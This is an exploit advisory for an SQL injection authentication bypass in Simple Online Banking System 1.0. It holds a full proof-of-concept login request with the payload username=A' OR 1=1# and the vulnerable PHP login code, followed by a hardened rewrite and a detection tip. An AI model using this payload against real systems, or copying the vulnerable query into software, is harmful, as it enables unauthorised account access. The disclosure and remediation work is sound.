Simple Online Banking System 1.0 SQL Injection

Simple Online Banking System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Packet Storm
# Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass)
# Date: 6 Jul, 2024
# CVE: N/A
# Exploit Author: bRpsd
# Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html
# Category: Web Application
# Version: 1.0
# Tested on: MacOS | Xampp

POC:

POST http://localhost/banking/classes/Login.php?f=login
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 36
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/banking/admin/login.php
Cookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=A' OR 1=1#&password=123

Vuln code: /classes/Login.php
Vuln parameter: username

  public function login(){
    extract($_POST);
    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
    if($qry->num_rows > 0){
      foreach($qry->fetch_array() as $k => $v){
        if(!is_numeric($k) && $k != 'password'){
          $this->settings->set_userdata($k,$v);
        }
      }
      $this->settings->set_userdata('login_type',1);
      return json_encode(array('status'=>'success'));
    }else{
      return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));
    }
  }
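The root cause in the snippet above is twofold: extract($_POST) turns arbitrary request fields into local variables, and those variables are interpolated straight into the SQL string, so the username field can terminate the quoted literal and comment out the password check. The failure branch also echoes the full query back to the client. The following hardened login() is an added example written for this advisory; it is not the project's own code. It assumes $this->conn is a mysqli connection (consistent with the ->query() and ->num_rows calls in the original), that mysqlnd is available so get_result() works, that $this->settings->set_userdata() is the same helper the original uses, and that the password column has been migrated from md5() digests to password_hash() output.

```php
<?php
// Added example: hardened replacement for login() in /classes/Login.php.
// Assumptions (not from the advisory): $this->conn is mysqli with mysqlnd,
// $this->settings->set_userdata() exists as in the original, and the
// `password` column now holds password_hash() digests instead of md5().

class Login
{
    private mysqli $conn;
    private $settings; // hypothetical: same settings object the original uses

    public function __construct(mysqli $conn, $settings)
    {
        $this->conn = $conn;
        $this->settings = $settings;
    }

    public function login(): string
    {
        // Never extract($_POST): read exactly the two fields that are expected.
        $username = (string)($_POST['username'] ?? '');
        $password = (string)($_POST['password'] ?? '');
        if ($username === '' || $password === '') {
            return json_encode(['status' => 'incorrect']);
        }

        // Parameterised query: the username travels separately from the SQL
        // text, so a value such as "A' OR 1=1#" is compared as a literal
        // string and cannot alter the WHERE clause.
        $stmt = $this->conn->prepare('SELECT * FROM users WHERE username = ? LIMIT 1');
        if ($stmt === false) {
            return json_encode(['status' => 'error']); // do not leak $this->conn->error
        }
        $stmt->bind_param('s', $username);
        $stmt->execute();
        $row = $stmt->get_result()->fetch_assoc();
        $stmt->close();

        // Verify against the stored password_hash() digest. The same response
        // is returned whether the user is missing or the password is wrong, and
        // the query text is never included in the reply.
        if ($row === null || !password_verify($password, (string)$row['password'])) {
            return json_encode(['status' => 'incorrect']);
        }

        // Fresh session id on privilege change prevents session fixation.
        if (session_status() === PHP_SESSION_ACTIVE) {
            session_regenerate_id(true);
        }

        // fetch_assoc() returns only string keys, so the is_numeric() filter
        // from the original is no longer needed; the hash still stays out of
        // the session.
        foreach ($row as $k => $v) {
            if ($k !== 'password') {
                $this->settings->set_userdata($k, $v);
            }
        }
        $this->settings->set_userdata('login_type', 1);
        return json_encode(['status' => 'success']);
    }
}
```

Migrating existing accounts is the one operational step this does not cover: password_verify() will reject the md5() digests the original schema stores, so each user's hash has to be replaced with password_hash() output (for example on their next successful login against a temporary legacy check) before this version is switched on. A detection-side check is equally simple: the original code's failure path returns last_qry, so any login response containing the string "SELECT * from users" in application or proxy logs indicates the unpatched handler is still deployed.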
